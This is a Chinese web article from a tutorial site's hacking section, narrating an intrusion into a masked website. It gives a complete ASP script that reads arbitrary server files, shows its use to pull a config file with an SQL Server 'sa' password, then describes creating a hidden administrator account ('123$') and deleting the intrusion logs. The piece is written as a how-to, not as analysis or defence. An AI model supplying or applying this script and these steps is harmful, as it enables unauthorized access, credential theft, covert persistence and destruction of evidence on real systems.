手机
当前位置:查字典教程网 >网络安全 >黑客入侵 >黑客是如何突破一流检测系统的
黑客是如何突破一流检测系统的
摘要:攻击目标:www.***.com测试过的动作,一句话马,加密马,等。测试结果:无效,无法上传,无法进入系统。经过2天的分析,然后自己搞出了一...

攻击目标:www.***.com

测试过的动作,一句话马,加密马,等。

测试结果:无效,无法上传,无法进入系统。

经过2天的分析,

然后自己搞出了一个代码,利用此代码读取了该网站下的config.asp文件源代码 ------------------------------------------------------------------------- <%

file=Request("file")

Set FSOOBJ=Server.CreateObject("Scripting.FileSystemObject")

if FSOOBJ.fileExists(file) then

Set myfile=FSOOBJ.opentextfile(file,1)

Response.write "<pre>" & server.HTMLEncode(myfile.readall) &"</pre>"

myfile.close

Set myfile=nothing

else

Response.write "file(" & file & ") not exists."

end if

%>

------------------------------------------------------------------------- http://www.***.com/view.asp?file=D:wwwrootindex.asp 读取到的敏感内容

sql地址:***.***.***.***

帐号:sa 密码:u8f2444f 利用此帐号进入后,建立了123$的隐藏管理员用户,删除入侵日志后退出。

【黑客是如何突破一流检测系统的】相关文章:

黑客经验谈:如何入侵能建立IPC$空衔接的主机

突破一流信息监控系统传木马并获得系统权限

怎样在CentOS上配置基于主机的入侵检测系统?

黑客在线之经典入侵技术总结 (三)

全方位了解黑客如何入侵NT系统

网页“黑手”如何入侵你的Windows系统

黑客在线之经典入侵技术总结 (二)

黑客谈对一台BT主机的入侵过程

详尽了解黑客入侵 WindowsXP系统的方法

DNS(域名服务器)欺骗技术

精品推荐
分类导航